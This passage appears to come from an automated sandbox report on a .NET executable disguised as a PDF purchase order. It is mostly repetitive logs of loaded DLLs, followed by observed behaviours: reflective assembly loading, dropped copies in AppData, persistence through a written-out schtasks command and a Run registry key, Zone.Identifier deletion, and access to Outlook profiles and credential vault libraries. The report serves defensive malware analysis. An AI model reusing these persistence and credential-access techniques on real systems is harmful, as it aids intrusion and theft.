                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: z38PO_20248099-1_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: z38PO_20248099-1_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: z38PO_20248099-1_pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: xaHV.pdbSHA256? source: z38PO_20248099-1_pdf.exe, FrFvspxoHsPs.exe.0.dr, sgxIb.exe.10.dr
                    Source: Binary string: xaHV.pdb source: z38PO_20248099-1_pdf.exe, FrFvspxoHsPs.exe.0.dr, sgxIb.exe.10.dr

                    Data Obfuscation

                    Source: z38PO_20248099-1_pdf.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: FrFvspxoHsPs.exe.0.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.cs .Net Code: qEJ4BgbjJ7 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.z38PO_20248099-1_pdf.exe.5680000.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.z38PO_20248099-1_pdf.exe.2bd7f58.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.cs .Net Code: qEJ4BgbjJ7 System.Reflection.Assembly.Load(byte[])
                    Source: z38PO_20248099-1_pdf.exe Static PE information: section name: .text entropy: 7.8170394032595425
                    Source: FrFvspxoHsPs.exe.0.dr Static PE information: section name: .text entropy: 7.8170394032595425
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, File created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, File created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe, File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
